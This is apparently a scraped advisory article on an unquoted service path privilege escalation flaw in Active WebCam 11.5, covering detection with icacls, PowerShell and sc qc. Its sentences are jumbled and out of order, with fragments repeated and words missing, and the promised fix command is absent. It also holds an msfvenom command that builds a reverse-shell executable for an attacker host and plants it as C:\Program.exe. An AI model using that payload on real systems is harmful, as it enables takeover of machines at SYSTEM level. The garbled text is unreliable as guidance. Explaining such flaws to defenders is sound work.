Once a path like C:\Program Files\Active Webcam\... is flagged, the tester verifies if normal users can write to any parent directories using the icacls utility: icacls "C:\Program Files" Use code with caution.
C:\Program Files\Active WebCam\webcam.exe
C:\Program Files\Active Webcam\awservice.exe
High. A local, unprivileged user can elevate privileges to SYSTEM . active webcam 115 unquoted service path patched
A recently identified in Active WebCam 11.5 has been officially patched. Users running versions prior to the patch are strongly advised to update immediately to mitigate potential local privilege escalation risks.
This article provides a comprehensive analysis of the , its implications, and how to verify that it has been patched . What is an Unquoted Service Path Vulnerability?
– e.g., Program.exe using msfvenom: msfvenom -p windows/x64/shell_reverse_tcp LHOST=attacker LPORT=4444 -f exe -o C:\Program.exe Once a path like C:\Program Files\Active Webcam\
Get-WmiObject win32_service | Where-Object $_.PathName -notlike '"*' -and $_.PathName -like '* *' | Select-Object Name, DisplayName, PathName Use code with caution.
Because this path contains spaces and is , Windows attempts to resolve the executable by first looking for C:\Program.exe , then C:\Program Files\Active.exe , and finally the intended C:\Program Files\Active WebCam\WebCam.exe file. An attacker who can create a malicious executable in the C:\ drive or in the C:\Program Files\ folder can hijack the service startup.
Administrators managing multiple endpoints can deploy a quick patch using the Windows sc config command via an elevated command prompt: A local, unprivileged user can elevate privileges to SYSTEM
When Windows attempts to launch a service, it parses the path string. If spaces exist and there are no quotes, the operating system tries to locate the executable by interpreting the spaces as breaks between the executable and its arguments.
This is a vulnerability. It cannot be exploited remotely unless combined with another flaw (e.g., remote code execution that drops a low-priv shell). However, on shared machines, kiosks, or employee workstations, it is a serious risk.
To prevent unquoted service path vulnerabilities entirely across an enterprise:
sc qc "Active Webcam Service"